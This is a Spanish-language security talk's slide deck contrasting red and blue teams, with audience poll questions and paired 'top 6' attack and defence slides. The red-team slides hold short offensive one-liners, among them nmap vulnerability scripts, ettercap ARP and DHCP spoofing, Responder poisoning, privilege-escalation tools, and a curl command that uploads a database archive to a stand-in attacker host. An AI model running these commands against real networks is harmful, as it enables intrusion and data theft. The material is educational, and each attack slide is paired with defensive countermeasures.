1.
Rojos/Azules: dos equipos
con dos sabores
Alejadro Ramos - 2015

2.
Introducción.
• Modo colaborativo.
• Se introducirá un tema y hacemos encuesta vía web.
• Al acabar vemos las respuestas y opinamos sobre ellas.
• Se espera vuestra participación (!!)
• Para que tenga sentido, vamos haciendo el test todos a
la vez.
URL: http://secby.me/redblueteam

3.
• Fecha de creación: lunes, 02 de marzo de 2015
274
• Respuestas totales
• Respuestas completas: 182

4.
Metodología: Assume Breach (Microsoft)
Metodología que da por perdida la primera parte de la batalla,
consiste en detectar gaps en las siguientes tácticas, técnicas y
procedimientos (TTP):
• Detección de ataques y penetraciones.
• Respuesta a los ataques y penetraciones.
• Recuperación de la fuga, modificación o compromiso de
información.
• Prevención de futuros ataques y penetración.

5.
¿Qué es para ti un Red Team?

6.
Q1: ¿Qué es para ti un red team?
• Respondido: 273 Omitido: 1

7.
Q1: ¿Qué es para ti un red team?
• Respondido: 273 Omitido: 1

8.
¿Seguridad ofensiva?

9.
Q2: ¿Seguridad ofensiva?
• Respondido: 267 Omitido: 7

10.
Q2: ¿Seguridad ofensiva?
• Respondido: 267 Omitido: 7

11.
Red Team.
The Red Team is a group of full-time staff within <company>
that focuses on breaching client infrastructure, platform and
client own tenants and applications. They are the dedicated
adversary (a group of ethical hackers) performing targeted and
persistent attacks.
- Microsoft
Objetivo medible mediante:
• Tiempo medio para comprometer - Mean Time to Compromise
(MTTC)
• Tiempo medio para escalar privilegios o pwnage - Mean Time to
Privilege Escalation or “Pwnage” (MTTP)

12.
¿Qué es para ti un Blue Team?

13.
Q3: ¿Qué es para ti un blue team?
• Respondido: 260 Omitido: 14

14.
Q3: ¿Qué es para ti un blue team?
• Respondido: 260 Omitido: 14

15.
¿Seguridad defensiva?

16.
Q4: ¿Seguridad defensiva?
• Respondido: 257 Omitido: 17

17.
Q4: ¿Seguridad defensiva?
• Respondido: 257 Omitido: 17

18.
Blue Team.
The Blue Team is comprised of either a dedicated set of
security responders or members from across the security
incident response, Engineering and Operations organizations.
-Microsoft
Objetivo medible mediante:
• Tiempo medio de detección - Mean-Time to Detect (MTTD)
• Tiempo medio de recuperación - Mean-Time to Recovery (MTTR)
Predecir Prevenir Detectar Responder

19.
¿SQLMap o mod_security?

20.
Q5: ¿SQLMap o de mod_security?
• Respondido: 257 Omitido: 17

21.
Q5: ¿SQLMap o de mod_security?
• Respondido: 257 Omitido: 17

22.
Así están las cosas para los azules.

23.
MTTC/MTTP Top 6 ataques
MTTD/MTTR Top 6 defensas
Desde una perspectiva de ejercicio con escenario interno.

24.
Red Top 1/6: Credenciales.
• WTF. Lo mismo de siempre, 30 años después.
• Por eso sigue en el Top.
• Ejemplos:
• Contraseñas en el Group Policy Preferences.
• Contraseñas en los comentarios de un usuario del
directorio activo.
• SQL Server sa/<blank> Oracle: SYSTEM/MANAGER
• Marzo2015 o similares como contraseña en AD.
• Y eso, si no hay un xls con todas las passwords en
una carpeta pública en un file server…
5 mins pwnage:
• nmap -p 1433 --script ms-sql-empty-password

25.
Blue Top 1/6: Credenciales.
Soluciones complejas (… por eso sigue en el top …)
• Robustecer “Passfilt.dll” de Windows con aplicación de terceros.
• Sistemas de salto “jumpbox” monitorizados.
• Soluciones de doble factor de autenticación.
• Aplicar acceso 4eyes a contraseñas sensibles / OTP
• “Honeyusers” con usuarios que únicamente ejecutan alertas.
• Monitorización exhaustiva de logins fallidos.
• Gestión de Identidades.
• Políticas de contraseñas, Captchas, bloqueos, etc…

26.
¿Solución a las contraseñas?

27.
Q6: ¿Solución a las contraseñas?
• Respondido: 252 Omitido: 22

28.
Q6: ¿Solución a las contraseñas?
• Respondido: 252 Omitido: 22

29.
Red Top 2/6: Vulnerabilidades en aplicaciones.
• Exploits conocidos o por conocer.
• Ejemplos:
• shellshock, heartbleed, jetleak…
• Los XP que quedan por ahí muertos.
• Java/Flash.
• Software de backup.
• Webs con RCE/LFI, etc.
5 mins pwnage:
• nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 …
• nmap -p 443 --script ssl-heartbleed …
• Metasploit …
• ./exploit-db.py

30.
Blue Top 2/6: Vulnerabilidades en aplicaciones.
• Arquitectura de red: segmentación de red, reglas en firewall internos.
• Uso de IPS.
• Despliegue automático de parches:
• Windows: SCCM/WSUS .
• Linux: Satellite/Spacewalk/Landscape
• chef/puppet/salt, etc
• EMET - Enhanced Mitigation Experience Toolkit.
• Grsecurity.
• Controles en navegación. Ej: alertas con User-Agents específicos de
Java.
• Vulnerability Scans y Revisiones de cumplimiento.

31.
¿Método DELETE, PUT en un
servidor web?

32.
Q7: Te encuentras el método DELETE y
PUT habilitado en un servidor web.
• Respondido: 246 Omitido: 28

33.
Q7: Te encuentras el método DELETE y
PUT habilitado en un servidor web.
• Respondido: 246 Omitido: 28

34.
Red Top 3/6: Ataques de red.
• Ataques Man In The Middle en sus 300 formas.
• Ejemplos:
• ARP Spoofing.
• WPAD Poisoning, LLMNR Poisoning.
• DHCP Spoofing.
• Rogue/Fake AP
5 mins pwnage:
• ettercap -T -q -i eth0 -M arp:remote /192.168.1.69/
/192.168.1.1/
• Responder -i 192.168.1.100 -wrf
• ettercap -Tq -M dhcp:/255.255.255.0/192.168.1.1
Imagen de: http://www.sternsecurity.com/

35.
Blue Top 3/6: Ataques de red.
• Aplicación de Network Access Control.
• Configuración de Dynamic ARP Inspection.
• Habilitar DHCP Snooping.
• El uso de protocolos cifrados.
• Desactivar IPv6.
• Desactivar Multicast Name Resolution.
• Evitar el uso de WPAD
• Implantar Wireless intrusion detection system
• Segmentación de red.
• Firewall / IPS

36.
¿Están superados los ataques de
red?

37.
Q8: ¿Están superados los ataques de red
internos?
• Respondido: 244 Omitido: 30

38.
Q8: ¿Están superados los ataques de red
internos?
• Respondido: 244 Omitido: 30

39.
Red Top 4/6: Privilegios
• De usuario guarrete a local admin, de local
admin a domain admin y de ahí al infinito.
• Ejemplos:
• Servicios con permisos incorrectos.
• Binarios en local o servidores de ficheros con
permisos incorrectos.
• Uso de usuarios de aplicación privilegiados.
• Usuarios del dominio con privilegios de Local
Admin.
• sudo demasiado permisivo.
5 mins pwnage:
• PowerUp.ps1: Invoke-AllChecks
• Sticky keys
• Kon-Boot

40.
Blue Top 4/6: Privilegios.
• Eliminar acceso al cmd y powershell.
• Meter en el registro una entrada no aceptando el EULA de
sysinternals (y proteger sus permisos).
• Activar UAC/Firewall de Windows.
• Permisos en las tareas programadas.
• Uso de listas blancas de binarios, comprobación de firmas, AppLocker,
etc.
• Eliminar acceso a USB/CD (bios)
• Cifrar contenido del disco duro, bitlocker y similares.

41.
En tu empresa, ¿Tienes
administrador local de tu PC?

42.
Q9: En tu empresa, ¿Tienes administrador
local de tu PC?
• Respondido: 242 Omitido: 32

43.
Q9: En tu empresa, ¿Tienes administrador
local de tu PC?
• Respondido: 242 Omitido: 32

44.
Red Top 5/6: In/Exfiltración
• Introducir o exportar información de la red. Documentos, herramientas o
cualquier otro tipo de fichero.
• Ejemplos:
• Mediante HTTP por el proxy.
• Correos electrónicos.
• Túneles DNS.
• IM
5 mins pwnage:
• curl --data-binary @mi_bbdd.zip http://muaha.net/upload.php

45.
Blue Top 5/6: In/Exfiltración.
• Inspección de SSL en navegación.
• Bloqueo de categorías tipo hacking, malware, etc.
• Bloquear la descarga de ejecutables y derivados.
• En caso de dominios no conocidos, página de bienvenida.
• Bloqueo de dominios jóvenes, Ej <20 días.
• Limitar peticiones POST, Ej cabeceras mayores de 50kb.
• No resolver DNS de Internet desde las workstation.
• Firmas específicas en IPS para túneles y otros covert channels.
• Bloqueo o cifrado de USB.
• Antivirus.

46.
¿Tu método favorito para mandar
documentación confidencial a
casa?

47.
Q10: ¿Cuál es tu método favorito para
mandar documentación confidencial a casa?
• Respondido: 241 Omitido: 33

48.
Q10: ¿Cuál es tu método favorito para
mandar documentación confidencial a casa?
• Respondido: 241 Omitido: 33

49.
¿Cuál tu top red 6?

50.
¿Cuál es tu top blue 6?

51.
Gracias.
Alejandro Ramos – Marzo 2015
www.securitybydefault.com / @aramosf
http://secby.me/redbluerespuestas